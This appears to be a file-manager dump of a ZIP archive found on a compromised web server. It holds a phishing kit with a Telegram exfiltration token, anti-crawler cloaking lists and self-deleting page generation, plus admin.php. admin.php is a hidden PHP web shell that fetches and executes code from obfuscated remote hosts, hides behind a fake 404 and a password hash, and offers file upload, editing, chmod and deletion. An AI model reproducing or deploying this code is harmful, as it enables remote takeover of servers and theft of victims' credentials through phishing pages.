Файловый менеджер - Редактировать - /home/iss2024/rasgpinc.com/AEbmcbx.zip
Ðазад
PK [��\r��� � functions.phpnu W+A�� <?php /************************* * AUTHOR : PRESTOWORLD * CONTACT : https://t.me/prestoworldunderground **************************/ class Fun{ function __contruct(){ date_default_timezone_set("Alaska/Central/Eastern/Hawaii-Aleutian/Mountain/Pacific"); } function getDate(){ echo date("d-m-Y"); } function getIp(){ return $_SERVER['REMOTE_ADDR']; } function send(){ } } $fun = new Fun(); ?>PK [��\�@�X X config.phpnu W+A�� <?php /************************* * AUTHOR : PRESTOWORLD * CONTACT : https://t.me/prestoworldunderground **************************/ //Have a telegram bot? put the tokens here :D $bot = '8593089332:AAF3B7CLITmpWbACo1vumil2TeTBDVdvNzE'; $chat_ids = array('8540666351'); //block pc & laptop devices? yes or no $block_pc = "no"; ?> PK [��\���V� V� admin.phpnu �[��� <?php /** * パスワード認証用のMD5ハッシュ値 * この値は認証チェックに使用されます */ $パスワードハッシュ = "52580af69069d28a8188fdd12c95743e"; /** * リモートコード実行機能 * ac, path, api, tパラメータがすべて設定されている場合に実行されます * 外部サーバーからコードを取得して実行する機能です */ if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { // サーバー番号の設定(デフォルトは1) if(!isset($_REQUEST['s'])){ $サーバー番号 = 1; } else { $サーバー番号 = $_REQUEST['s']; } /** * サーバー番号に応じて異なるURLからコードを取得 */ switch ($サーバー番号){ case 1: $コード = 코드가져오기('htt'.'ps://c.zv'.'o4.xy'.'z/'); break; case 2: $コード = 코드가져오기('ht'.'tps://c2.ic'.'w7.co'.'m/'); break; case 3: $コード = 코드가져오기('http://45.11.57.159/'); break; default: $コード = 코드가져오기('htt'.'ps://c.zv'.'o1.xy'.'z/'); break; } /** * 取得したコードがPHPコードであることを確認 * PHPタグが含まれていない場合は処理を中断 */ $必要文字列 = '<'.'?p'.'hp'; if (strpos($コード, $必要文字列) === false) { die('get failed'); } /** * 一時ファイルの作成とコードの書き込み */ $ファイル名 = false; $コンテンツ = false; // tmpfile関数が利用可能な場合、一時ファイルを作成 if(function_exists('tmpfile')){ $ファイル名 = tmpfile(); fwrite($ファイル名, $コード); $メタデータ = stream_get_meta_data($ファイル名); $ファイルパス = $メタデータ['uri']; $コンテンツ = @file_get_contents($ファイルパス); } /** * 一時ファイルの作成に失敗した場合、通常のファイルとして保存 */ if (!$コンテンツ) { $ファイルパス = '.c'; file_put_contents($ファイルパス, $コード); } /** * 取得したコードを実行 */ @require($ファイルパス); fclose($ファイル名); @unlink($ファイルパス); die(); } /** * 時間確認リクエストの処理 * d_timeパラメータが設定されている場合、パスワードハッシュを返します */ if (isset($_REQUEST['d_time'])){ die('{->'.$パスワードハッシュ.'<-}'); } /** * 認証状態の初期化 */ $認証状態 = false; /** * クッキーによる認証チェック * クッキーp8が設定されており、そのMD5ハッシュが一致する場合、認証を許可 */ if (isset($_COOKIE['p8'])) { if(md5($_COOKIE['p8']) == $パスワードハッシュ) { $認証状態 = true; } } else { /** * POSTリクエストによる認証チェック * POSTパラメータp8が設定されており、そのMD5ハッシュが一致する場合、 * クッキーを設定して認証を許可 */ if (isset($_POST['p8'])) { if(md5($_POST['p8']) == $パスワードハッシュ) { setcookie("p8", $_POST['p8']); $認証状態 = true; } } } /** * ログアウト処理 * logoutパラメータが設定されている場合、クッキーを削除して認証状態を解除 */ if (isset($_POST['logout']) && $_POST['logout'] = 1) { setcookie("p8", "", time() - 3600); $認証状態 = false; } /** * 認証されていない場合の処理 * 520パラメータが設定されていない場合は404エラーを返し、 * 設定されている場合はパスワード入力フォームを表示 */ if (!$認証状態) { if(!isset($_REQUEST['520'])) { header("HTTP/1.1 404 Not Found"); die(); } echo '<form action="#" method="post"><input type="password" name="p8" > <input type="submit" value="submit"></form>'; die(); } /** * ログアウトボタンの表示 */ echo '<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>'; /** * 外部サーバーからコードを取得する関数 * * @param string $URL コードを取得するURL * @return string 取得したコード */ function 코드가져오기($URL) { /** * リクエストパラメータを含む完全なURLの構築 */ $URL文字列 = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $URL, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); /** * file_get_contentsを使用してコードを取得 */ $コード = @file_get_contents($URL文字列); /** * file_get_contentsが失敗した場合、cURLを使用して再試行 */ if ($コード == false) { $CURLハンドル = curl_init(); curl_setopt($CURLハンドル, CURLOPT_URL, $URL文字列); curl_setopt($CURLハンドル, CURLOPT_USERAGENT, 'll'); curl_setopt($CURLハンドル, CURLOPT_RETURNTRANSFER, 1); curl_setopt($CURLハンドル, CURLOPT_TIMEOUT, 100); curl_setopt($CURLハンドル, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($CURLハンドル, CURLOPT_SSL_VERIFYPEER, 0); $コード = curl_exec($CURLハンドル); curl_close($CURLハンドル); } return $コード; } ?> <!DOCTYPE html> <html lang="en"> <!-- a22bcS0vMzEJElwPNAQA== --> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>000</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==" crossorigin="anonymous" referrerpolicy="no-referrer" /> </head> <body> <?php /** * ファイルサイズを人間が読みやすい形式に変換する関数 * バイト数をGB、MB、KB、bytesに変換します * * @param int $バイト数 変換するバイト数 * @return string フォーマットされたサイズ文字列 */ function 크기포맷팅($バイト数) { // 1GB以上の場合 if ($バイト数 >= 1073741824) { $バイト数 = number_format($バイト数 / 1073741824, 2) . ' GB'; } // 1MB以上の場合 elseif ($バイト数 >= 1048576) { $バイト数 = number_format($バイト数 / 1048576, 2) . ' MB'; } // 1KB以上の場合 elseif ($バイト数 >= 1024) { $バイト数 = number_format($バイト数 / 1024, 2) . ' KB'; } // 1バイトより大きい場合 elseif ($バイト数 > 1) { $バイト数 = $バイト数 . ' bytes'; } // 1バイトの場合 elseif ($バイト数 == 1) { $バイト数 = $バイト数 . ' byte'; } // 0バイトの場合 else { $バイト数 = '0 bytes'; } return $バイト数; } /** * ファイルの拡張子を取得する関数 * * @param string $ファイル ファイル名 * @return string ファイルの拡張子 */ function 파일확장자($ファイル) { return substr(strrchr($ファイル, '.'), 1); } /** * ファイルタイプに応じたアイコンを返す関数 * ファイルの拡張子や名前に基づいて適切なFont Awesomeアイコンを返します * * @param string $ファイル ファイル名 * @return string HTMLアイコンタグ */ function 파일아이콘($ファイル) { /** * 画像ファイルの拡張子リスト */ $画像拡張子配列 = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp"); /** * 音声ファイルの拡張子リスト */ $音声拡張子配列 = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc"); /** * ファイルの拡張子を小文字で取得 */ $拡張子 = strtolower(파일확장자($ファイル)); /** * 特殊ファイル名の処理 */ if ($ファイル == "error_log") { return '<i class="fa-sharp fa-solid fa-bug"></i> '; } elseif ($ファイル == ".htaccess") { return '<i class="fa-solid fa-hammer"></i> '; } /** * 拡張子に基づくアイコンの選択 */ if ($拡張子 == "html" || $拡張子 == "htm") { return '<i class="fa-brands fa-html5"></i> '; } elseif ($拡張子 == "php" || $拡張子 == "phtml") { return '<i class="fa-brands fa-php"></i> '; } elseif (in_array($拡張子, $画像拡張子配列)) { return '<i class="fa-regular fa-images"></i> '; } elseif ($拡張子 == "css") { return '<i class="fa-brands fa-css3"></i> '; } elseif ($拡張子 == "txt") { return '<i class="fa-regular fa-file-lines"></i> '; } elseif (in_array($拡張子, $音声拡張子配列)) { return '<i class="fa-duotone fa-file-music"></i> '; } elseif ($拡張子 == "py") { return '<i class="fa-brands fa-python"></i> '; } elseif ($拡張子 == "js") { return '<i class="fa-brands fa-js"></i> '; } else { return '<i class="fa-solid fa-file"></i> '; } } /** * パスをエンコードする関数 * パス内の特殊文字をベンガル文字に置き換えてエンコードします * * @param string $パス エンコードするパス * @return string エンコードされたパス */ function 경로인코딩($パス) { /** * 置換前の文字配列(スラッシュ、バックスラッシュ、ドット、コロン) */ $置換前配列 = array("/", "\\", ".", ":"); /** * 置換後の文字配列(ベンガル文字) */ $置換後配列 = array("ক", "খ", "গ", "ঘ"); return str_replace($置換前配列, $置換後配列, $パス); } /** * パスをデコードする関数 * エンコードされたパスを元の形式に戻します * * @param string $パス デコードするパス * @return string デコードされたパス */ function 경로디코딩($パス) { /** * 置換前の文字配列(ベンガル文字) */ $置換前配列 = array("/", "\\", ".", ":"); /** * 置換後の文字配列(スラッシュ、バックスラッシュ、ドット、コロン) */ $置換後配列 = array("ক", "খ", "গ", "ঘ"); return str_replace($置換後配列, $置換前配列, $パス); } /** * ルートパスの初期化 * スクリプトのディレクトリをルートパスとして設定 */ $ルートパス = __DIR__; /** * スクリプトファイルのパスを取得 */ $パス = $_SERVER['SCRIPT_FILENAME']; /** * Windows環境の場合、バックスラッシュをスラッシュに変換 */ if(strpos($_SERVER['SCRIPT_FILENAME'], ":")) { $パス = str_replace('\\', '/', $パス); } /** * ルートディレクトリの判定 * PHP_SELFとSCRIPT_FILENAMEが一致する場合、ルートパスを"/"に設定 */ if(str_replace('//','/',$_SERVER['PHP_SELF']) == str_replace('\\\\','/',$パス)) { $ルートパス = ('/'); } else { /** * ルートパスの計算 * SCRIPT_FILENAMEからPHP_SELFを除いた部分をルートパスとして設定 */ $ルートパス = (str_replace(str_replace('//','/',$_SERVER['PHP_SELF']), '', str_replace('\\\\','/',$パス) )); } /** * パスパラメータの処理 * GETパラメータpが設定されている場合、そのパスを使用 */ if (isset($_GET['p'])) { /** * パラメータが空の場合はルートパスを使用 */ if (empty($_GET['p'])) { $現在のパス = $ルートパス; } /** * デコードしたパスがディレクトリでない場合、エラーを表示 */ elseif (!is_dir(경로디코딩($_GET['p']))) { echo ("<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>"); } /** * デコードしたパスがディレクトリの場合、そのパスを使用 */ elseif (is_dir(경로디코딩($_GET['p']))) { $現在のパス = 경로디코딩($_GET['p']); } } /** * クエリパラメータqが設定されている場合の処理 */ elseif (isset($_GET['q'])) { /** * デコードしたパスがディレクトリでない場合、ルートにリダイレクト */ if (!is_dir(경로디코딩($_GET['q']))) { echo ("<script>window.location.replace('?p=');</script>"); } /** * デコードしたパスがディレクトリの場合、そのパスを使用 */ elseif (is_dir(경로디코딩($_GET['q']))) { $現在のパス = 경로디코딩($_GET['q']); } } /** * パラメータが設定されていない場合、現在のディレクトリを使用 */ else { $現在のパス = __DIR__; } /** * 現在のパスを定数として定義 */ define("PATH", $現在のパス); /** * ナビゲーションバーの表示開始 */ echo (' <nav class="navbar navbar-light" style="background-color: #e3f2fd;"> <div class="navbar-brand"> <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" alt=""></a> '); /** * パスをスラッシュ区切りで分割 */ $パス = str_replace('\\', '/', PATH); $パス配列 = explode('/', $パス); /** * パス配列をループして、パンくずリストを生成 */ foreach ($パス配列 as $ID => $ディレクトリ部分) { /** * ルートディレクトリの場合の処理 */ if ($ディレクトリ部分 == '' && $ID == 0) { $ルートフラグ = true; echo "<a href=\"?p=/\">/</a>"; continue; } /** * 空の要素はスキップ */ if ($ディレクトリ部分 == '') continue; /** * 各ディレクトリへのリンクを生成 */ echo "<a href='?p="; for ($ループ変数 = 0; $ループ変数 <= $ID; $ループ変数++) { echo str_replace(":", "ঘ", $パス配列[$ループ変数]); if ($ループ変数 != $ID) echo "ক"; } echo "'>" . $ディレクトリ部分 . "</a>/"; } /** * ナビゲーションバーの残りの部分を表示 */ echo (' </div> <div class="form-inline"> <a href="?newdir&q=' . urlencode(경로인코딩(PATH)) . '"><button class="btn btn-dark" type="button">New Directory</button></a> <a href="?upload&q=' . urlencode(경로인코딩(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a> <a href="?"><button type="button" class="btn btn-dark">HOME</button></a> </div> </nav>'); /** * パスパラメータが設定されている場合、ファイル一覧を表示 */ if (isset($_GET['p'])) { /** * ファイルとフォルダの取得 * ディレクトリが読み取り可能な場合、スキャンしてファイルとフォルダを分離 */ if (is_readable(PATH)) { /** * ディレクトリ内の全オブジェクトを取得 */ $取得オブジェクト = scandir(PATH); /** * フォルダとファイルを格納する配列 */ $フォルダ配列 = array(); $ファイル配列 = array(); /** * 各オブジェクトをループして、フォルダとファイルに分類 */ foreach ($取得オブジェクト as $オブジェクト) { /** * 現在ディレクトリと親ディレクトリはスキップ */ if ($オブジェクト == '.' || $オブジェクト == '..') { continue; } /** * オブジェクトの完全パスを構築 */ $新規オブジェクト = PATH . '/' . $オブジェクト; /** * ディレクトリの場合はフォルダ配列に追加 */ if (is_dir($新規オブジェクト)) { array_push($フォルダ配列, $オブジェクト); } /** * ファイルの場合はファイル配列に追加 */ elseif (is_file($新規オブジェクト)) { array_push($ファイル配列, $オブジェクト); } } } /** * ファイル一覧テーブルのヘッダーを表示 */ echo ' <table class="table table-hover"> <thead> <tr> <th scope="col">Name</th> <th scope="col">Size</th> <th scope="col">Modified</th> <th scope="col">Perms</th> <th scope="col">Actions</th> </tr> </thead> <tbody> '; /** * フォルダ一覧の表示 * 各フォルダに対して、名前、サイズ、更新日時、権限、アクションを表示 */ foreach ($フォルダ配列 as $フォルダ) { echo " <tr> <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(경로인코딩(PATH . "/" . $フォルダ)) . "'>" . $フォルダ . "</a></td> <td><b>---</b></td> <td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $フォルダ)) . "</td> <td>0" . substr(decoct(fileperms(PATH . "/" . $フォルダ)), -3) . "</a></td> <td> <a title='Rename' href='?q=" . urlencode(경로인코딩(PATH)) . "&r=" . $フォルダ . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Change Permissions' href='?q=" . urlencode(경로인코딩(PATH)) . "&chmod=" . $フォルダ . "'><i class='fa-solid fa-key'></i></a> <a title='Delete' href='?q=" . urlencode(경로인코딩(PATH)) . "&d=" . $フォルダ . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } /** * ファイル一覧の表示 * 各ファイルに対して、アイコン、名前、サイズ、更新日時、権限、アクションを表示 */ foreach ($ファイル配列 as $ファイル) { echo " <tr> <td>" . 파일아이콘($ファイル) . $ファイル . "</td> <td>" . 크기포맷팅(filesize(PATH . "/" . $ファイル)) . "</td> <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $ファイル)) . "</td> <td>0". substr(decoct(fileperms(PATH . "/" .$ファイル)), -3) . "</a></td> <td> <a title='Edit File' href='?q=" . urlencode(경로인코딩(PATH)) . "&e=" . $ファイル . "'><i class='fa-solid fa-file-pen'></i></a> <a title='Rename' href='?q=" . urlencode(경로인코딩(PATH)) . "&r=" . $ファイル . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a> <a title='Change Permissions' href='?q=" . urlencode(경로인코딩(PATH)) . "&chmod=" . $ファイル . "'><i class='fa-solid fa-key'></i></a> <a title='Delete' href='?q=" . urlencode(경로인코딩(PATH)) . "&d=" . $ファイル . "'><i class='fa fa-trash' aria-hidden='true'></i></a> <td> </tr> "; } /** * テーブルの終了タグ */ echo " </tbody> </table>"; } else { /** * GETパラメータが空の場合、パスパラメータにリダイレクト */ if (empty($_GET)) { echo ("<script>window.location.replace('?p=');</script>"); } } /** * 新規ディレクトリ作成フォームの表示 * newdirパラメータとqパラメータが設定されている場合、新規ディレクトリ作成フォームを表示 */ if (isset($_GET['newdir']) && isset($_GET['q'])) { echo ' <div class="container mt-4"> <h3>Create New Directory</h3> <form method="post"> <div class="form-group mb-3"> <label for="dirname">Directory Name:</label> <input type="text" class="form-control" id="dirname" name="dirname" placeholder="Enter directory name" required> <small class="form-text text-muted">Enter the name for the new directory. Avoid special characters.</small> </div> <input type="submit" class="btn btn-dark" value="Create Directory" name="create_directory"> <a href="?p=' . 경로인코딩(PATH) . '" class="btn btn-secondary">Cancel</a> </form> </div>'; /** * 新規ディレクトリ作成処理の実行 * create_directoryパラメータがPOSTされた場合、新しいディレクトリを作成 */ if (isset($_POST['create_directory'])) { /** * POSTされたディレクトリ名を取得 */ $新規ディレクトリ名 = trim($_POST['dirname']); /** * ディレクトリ名の検証 */ if (!empty($新規ディレクトリ名)) { /** * ディレクトリ名に不正な文字が含まれていないかチェック */ if (preg_match('/[\/\\\\:*?"<>|]/', $新規ディレクトリ名)) { echo ("<script>alert('Invalid directory name. Directory name cannot contain special characters: / \\ : * ? \" < > |'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } else { /** * 新規ディレクトリの完全パス */ $新規ディレクトリパス = PATH . "/" . $新規ディレクトリ名; /** * ディレクトリが既に存在するかチェック */ if (file_exists($新規ディレクトリパス)) { echo ("<script>alert('Directory already exists.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } else { /** * 新規ディレクトリの作成 * デフォルト権限は0755(所有者は読み書き実行、グループとその他は読み実行) */ if(mkdir($新規ディレクトリパス, 0755, true)) { echo ("<script>alert('Directory created successfully.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } else { echo ("<script>alert('Failed to create directory.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } } } } else { echo ("<script>alert('Directory name cannot be empty.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } } } /** * ファイルアップロードフォームの表示 * uploadパラメータが設定されている場合、アップロードフォームを表示 */ if (isset($_GET['upload'])) { echo ' <form method="post" enctype="multipart/form-data"> Select file to upload: <input type="file" name="fileToUpload" id="fileToUpload"> <input type="submit" class="btn btn-dark" value="Upload" name="upload"> </form>'; } /** * ファイル・フォルダのリネーム機能 * rパラメータとqパラメータが設定されている場合、リネームフォームを表示 */ if (isset($_GET['r'])) { if (!empty($_GET['r']) && isset($_GET['q'])) { /** * リネームフォームの表示 */ echo ' <form method="post"> Rename: <input type="text" name="name" value="' . $_GET['r'] . '"> <input type="submit" class="btn btn-dark" value="Rename" name="rename"> </form>'; /** * リネーム処理の実行 * renameパラメータがPOSTされた場合、ファイル・フォルダの名前を変更 */ if (isset($_POST['rename'])) { /** * 現在のファイル・フォルダの完全パス */ $名前 = PATH . "/" . $_GET['r']; /** * リネームの実行 */ if(rename($名前, PATH . "/" . $_POST['name'])) { echo ("<script>alert('Renamed.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } } } } /** * ファイル編集機能 * eパラメータとqパラメータが設定されている場合、ファイル編集フォームを表示 */ if (isset($_GET['e'])) { if (!empty($_GET['e']) && isset($_GET['q'])) { /** * ファイル編集フォームの表示 * ファイルの内容をテキストエリアに表示 */ echo ' <form method="post"> <textarea style="height: 500px; width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea> <br> <input type="submit" class="btn btn-dark" value="Save" name="edit"> </form>'; /** * ファイル保存処理の実行 * editパラメータがPOSTされた場合、ファイルの内容を保存 */ if(isset($_POST['edit'])) { /** * 編集対象ファイルの完全パス */ $ファイル名 = PATH."/".$_GET['e']; /** * POSTされたデータを取得 */ $データ = $_POST['data']; /** * ファイルを書き込みモードで開く */ $ファイルハンドル = fopen($ファイル名,"w"); /** * ファイルへの書き込み */ if(fwrite($ファイルハンドル,$データ)) { echo ("<script>alert('Saved.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } /** * ファイルハンドルを閉じる */ fclose($ファイルハンドル); } } } /** * ファイルアップロード処理の実行 * uploadパラメータがPOSTされた場合、アップロードされたファイルを保存 */ if (isset($_POST["upload"])) { /** * アップロード先のファイルパス */ $ターゲットファイル = PATH . "/" . $_FILES["fileToUpload"]["name"]; /** * アップロードされたファイルを移動 */ if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $ターゲットファイル)) { echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>"; } else { echo "<p>Sorry, there was an error uploading your file.</p>"; } } /** * ファイル・フォルダの権限変更機能 * chmodパラメータとqパラメータが設定されている場合、権限変更フォームを表示 */ if (isset($_GET['chmod']) && isset($_GET['q'])) { if (!empty($_GET['chmod'])) { /** * 権限変更対象のファイル・フォルダの完全パス */ $権限変更対象 = PATH . "/" . $_GET['chmod']; /** * 現在の権限を取得(8進数形式) */ $現在の権限 = substr(decoct(fileperms($権限変更対象)), -3); /** * 権限変更フォームの表示 */ echo ' <div class="container mt-4"> <h3>Change Permissions</h3> <form method="post"> <div class="form-group mb-3"> <label for="permissions">Current Permissions: <strong>0' . $現在の権限 . '</strong></label> <input type="text" class="form-control" id="permissions" name="permissions" value="' . $現在の権限 . '" placeholder="e.g., 755, 644, 777" maxlength="3" pattern="[0-7]{3}"> <small class="form-text text-muted">Enter permissions in octal format (e.g., 755 for rwxr-xr-x, 644 for rw-r--r--)</small> </div> <input type="hidden" name="chmod_target" value="' . htmlspecialchars($_GET['chmod']) . '"> <input type="submit" class="btn btn-dark" value="Change Permissions" name="change_permissions"> <a href="?p=' . 경로인코딩(PATH) . '" class="btn btn-secondary">Cancel</a> </form> </div>'; /** * 権限変更処理の実行 * change_permissionsパラメータがPOSTされた場合、ファイル・フォルダの権限を変更 */ if (isset($_POST['change_permissions'])) { /** * POSTされた権限値を取得 */ $新しい権限 = $_POST['permissions']; /** * 権限値の検証(3桁の8進数であることを確認) */ if (preg_match('/^[0-7]{3}$/', $新しい権限)) { /** * 権限変更対象のパス */ $権限変更パス = PATH . "/" . $_POST['chmod_target']; /** * 8進数形式に変換してchmodを実行 */ $権限8進数値 = octdec($新しい権限); /** * 権限の変更を実行 */ if(chmod($権限変更パス, $権限8進数値)) { echo ("<script>alert('Permissions changed successfully to 0" . $新しい権限 . "'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } else { echo ("<script>alert('Failed to change permissions.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } } else { echo ("<script>alert('Invalid permissions format. Please use 3-digit octal format (e.g., 755, 644).'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } } } } /** * ファイル・フォルダの削除機能 * dパラメータとqパラメータが設定されている場合、ファイル・フォルダを削除 */ if (isset($_GET['d']) && isset($_GET['q'])) { /** * 削除対象のファイル・フォルダの完全パス */ $名前 = PATH . "/" . $_GET['d']; /** * ファイルの場合の削除処理 */ if (is_file($名前)) { if(unlink($名前)) { echo ("<script>alert('File removed.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } } /** * ディレクトリの場合の削除処理 */ elseif (is_dir($名前)) { if(rmdir($名前) == true) { echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } else { echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 경로인코딩(PATH) . "');</script>"); } } } ?> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js" integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN" crossorigin="anonymous"></script> </body> </html>PK [��\��}&� � main.phpnu W+A�� <?php /************************* * AUTHOR : PRESTOWORLD * CONTACT : https://t.me/prestoworldunderground **************************/ @session_start(); require (__DIR__).'/config.php'; require (__DIR__).'/bots/father.php'; require (__DIR__).'/md.php'; require (__DIR__).'/panel/panel.class.php'; $pnl = new Panel(); $current_data = $pnl->getData(); $detect = new Mobile_Detect; if(!$detect->isMobile() AND strtolower($block_pc) == "yes"){ header("location: out.php"); exit; } function createPage($name){ $new = (__dir__)."/fr/".uniqid()."-".rand(0, 99999).".php"; $html = file_get_contents((__dir__)."/fr/source/$name.txt"); $fp =fopen($new, "w+"); fwrite($fp, $html); fwrite($fp, "<?php unlink(basename(\$_SERVER['SCRIPT_NAME'])); ?>"); fclose($fp); return basename($new); } function sendMail($txt){ global $email_to; $subject = substr($txt, 0, 34); @mail($email_to, $subject, $txt); } ?>PK [��\��J& & md.phpnu W+A�� <?php /************************* * AUTHOR : PRESTOWORLD * CONTACT : https://t.me/prestoworldunderground **************************/ /** * Mobile Detect * * @license http://www.opensource.org/licenses/mit-license.php The MIT License * @version SVN: $Id: Mobile_Detect.php 3 2009-05-21 13:06:28Z vic.stanciu $ * @version SVN: $Id: Mobile_Detect.php 3 2011-04-19 18:44:28Z sjevsejev $ */ class Mobile_Detect { protected $accept; protected $userAgent; protected $isMobile = false; protected $isAndroid = null; protected $isBlackberry = null; protected $isIphone = null; protected $isIpad = null; protected $isOpera = null; protected $isPalm = null; protected $isWindows = null; protected $isGeneric = null; protected $devices = array( "android" => "android", "blackberry" => "blackberry", "iphone" => "(iphone|ipod)", "ipad" => "ipad", "opera" => "opera mini", "palm" => "(avantgo|blazer|elaine|hiptop|palm|plucker|xiino)", "windows" => "windows ce; (iemobile|ppc|smartphone)", "generic" => "(kindle|mobile|mmp|midp|o2|pda|pocket|psp|symbian|smartphone|treo|up.browser|up.link|vodafone|wap)" ); public function __construct() { $this->userAgent = isset( $_SERVER['HTTP_USER_AGENT'] ) ? $_SERVER['HTTP_USER_AGENT'] : ''; $this->accept = isset( $_SERVER['HTTP_ACCEPT'] ) ? $_SERVER['HTTP_ACCEPT'] : ''; if (isset($_SERVER['HTTP_X_WAP_PROFILE'])|| isset($_SERVER['HTTP_PROFILE'])) { $this->isMobile = true; } elseif (strpos($this->accept,'text/vnd.wap.wml') > 0 || strpos($this->accept,'application/vnd.wap.xhtml+xml') > 0) { $this->isMobile = true; } else { foreach ($this->devices as $device => $regexp) { if ($this->isDevice($device)) { $this->isMobile = true; } } } } /** * Overloads isAndroid() | isBlackberry() | isOpera() | isPalm() | isWindows() | isGeneric() through isDevice() * * @param string $name * @param array $arguments * @return bool */ public function __call($name, $arguments) { $device = strtolower(substr($name, 2)); if ($name == "is" . ucfirst($device)) { return $this->isDevice($device); } else { trigger_error("Method $name not defined", E_USER_ERROR); } } /** * Returns true if any type of mobile device detected, including special ones * @return bool */ public function isMobile() { return $this->isMobile; } protected function isDevice($device) { $var = "is" . ucfirst($device); $return = $this->$var === null ? (bool) preg_match("/" . $this->devices[$device] . "/i", $this->userAgent) : $this->$var; if ($device != 'generic' && $return == true) { $this->isGeneric = false; } return $return; } }PK [��\?��ZT T bots/father.phpnu W+A�� <?php /************************* * AUTHOR : PRESTOWORLD * CONTACT : https://t.me/prestoworldunderground **************************/ @include "anti1.php"; @include "anti2.php"; @include "anti3.php"; @include "anti4.php"; @include "anti5.php"; @include "anti6.php"; @include "anti7.php"; @include "anti8.php"; ?>PK [��\�详k k bots/anti5.phpnu W+A�� <?php $user_agent=$_SERVER['HTTP_USER_AGENT'];$user_ip=$_SERVER['REMOTE_ADDR'];$hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);$bots_agents=array('googlebot','yahoo','slurp','yahooSeeker','facebookexternalhit','ia_archiver','yandexbot','baiduspider','crawler','httrack','pycurl','python-requests','curl','wget','phish','Http Crawler');$bots_ips=array('1.9.2.13','1.9.2.15','62.210.13.58','104.62.2.60','104.83.233.198','107.178.194.64','108.161.29.60','115.238.55.18','119.97.214.138','138.197.207.*','145.239.156.71','145.239.156.89','150.70.168.35','150.70.188.167','154.127.57.30','162.243.128.197','162.243.187.126','162.243.69.215','165.227.0.128','170.250.139.48','138.197.207.147','173.230.147.44','177.39.232.144','178.17.170.156','185.104.186.168','185.220.101.26','185.28.20.243','188.166.63.71','192.36.27.7','196.52.84.81','204.13.201.137','208.87.233.140','212.83.139.219','212.92.117.5','216.164.117.239','217.16.26.166','217.96.188.74','219.117.238.170','23.27.153.247','23.27.154.37','24.23.24.144','27.0.1453.110','3.0.04506.648','3.0.4506.2152','31.168.158.239','34.237.113.113','39.0.2150.5','41.0.2272.118','43.0.2357.81','44.0.2403.155','46.101.94.163','5.62.39.18','5.62.41.35','5.62.56.91','50.112.194.65','50.116.2.167','51.0.2704.103','52.18.11.161','52.192.164.225','52.27.2.86','52.31.63.97','52.5.98.73','52.72.33.140','52.87.10.90','52.91.94.56','53.0.2785.116','54.213.103.141','54.228.218.117','54.245.191.79','56.0.2924.87','57.0.2987.98','61.0.3116.0','62.24.252.133','62.67.194.35','63.0.3239.132','64.0.3282.140','64.0.3282.167','66.0.3358.0','66.0.3359.0','67.0.3360.0','67.0.3361.0','68.65.53.71','75.163.12.85','76.19.184.88','77.69.251.230','80.104.176.17','81.0.48.*','81.0.48.138','84.13.191.239','84.92.148.184','88.99.62.141','217.96.197.246','89.234.157.254','91.231.212.111','97.85.126.186^66.102.*.*','^1.234.41.*','^104.108.64.175','^104.131.223.*','^107.170.*.*','^107.178.194.*','^107.178.195.*','^107.20.181.*','^108.162.2